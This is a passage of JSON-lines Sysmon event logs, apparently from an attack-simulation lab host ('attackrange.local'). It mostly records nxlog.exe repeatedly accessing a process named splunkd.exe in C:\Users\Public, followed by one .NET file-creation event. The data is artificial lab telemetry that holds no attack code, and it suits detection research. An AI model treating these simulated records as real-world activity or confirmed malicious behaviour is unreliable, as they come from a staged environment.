(x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6934,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:23.554\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:23.554","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6935,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:24.554\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:24.554","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6936,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:25.554\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:25.554","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6937,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:26.554\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:26.554","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6938,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:27.555\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:27.555","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6939,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:28.555\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:28.555","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6940,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:59:28.773\r\nProcessGuid: {E2A3D6B1-12CA-5F25-0000-0010FEDC0900}\r\nProcessId: 3220\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\c94-0\\System.Core.dll\r\nCreationUtcTime: 2020-08-01 06:59:28.773","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:59:28.773","ProcessGuid":"{E2A3D6B1-12CA-5F25-0000-0010FEDC0900}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\c94-0\\System.Core.dll","CreationUtcTime":"2020-08-01 06:59:28.773","EventReceivedTime":"2020-08-01 06:59:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
